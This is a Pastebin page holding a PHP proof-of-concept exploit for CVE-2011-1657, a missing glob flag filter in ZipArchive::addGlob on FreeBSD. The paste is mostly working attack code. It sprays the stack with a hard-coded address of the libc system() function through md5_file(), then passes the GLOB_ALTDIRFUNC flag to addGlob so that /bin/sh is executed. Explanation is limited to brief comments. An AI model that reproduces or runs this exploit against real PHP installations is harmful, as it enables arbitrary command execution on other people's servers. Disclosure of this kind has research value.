Want more features on Pastebin? Sign Up, it's FREE!
Guest

Untitled

By: a guest on Jul 4th, 2011  |  syntax: PHP  |  size: 0.83 KB  |  views: 1,048  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. <?php
  2.     /* CVE-2011-1657: php <= 3.5.6 ZipArchive::addGlob() missing glob flags filtering
  3.      *
  4.      * Lame and JustForFun FreeBSD PoC using GLOB_ALTDIRFUNC glob() flag to pown!
  5.      *
  6.      * (c) 2011 - Clement LECIGNE <clemun at gmail dot com>
  7.      */
  8.  
  9.     /* Create a file for our md5_file() stack spray.
  10.      */
  11.     $system_addr = "\x50\x78\x8d\x28";  /* FreeBSD 8.2-RELASE system() libc addr */
  12.     $own = fopen("owned", "w");
  13.     fwrite($own, str_repeat($system_addr, 4096/4));
  14.     fclose($own);
  15.  
  16.     /* Fake zip, empty file is a valid zip.
  17.      */
  18.     $path = "foo.zip";
  19.     unlink($path);
  20.     fopen($path, "a");
  21.     $nx=new ZipArchive();
  22.     $nx->open($path);
  23.  
  24.     /* Lame stack spraying \o/
  25.      */
  26.     md5_file("owned");
  27.  
  28.     /* Bing. globbuf.gl_opendir() = system()
  29.      */
  30.     $nx->addGlob("/bin/sh", 64);
  31. ?>
clone this paste RAW Paste Data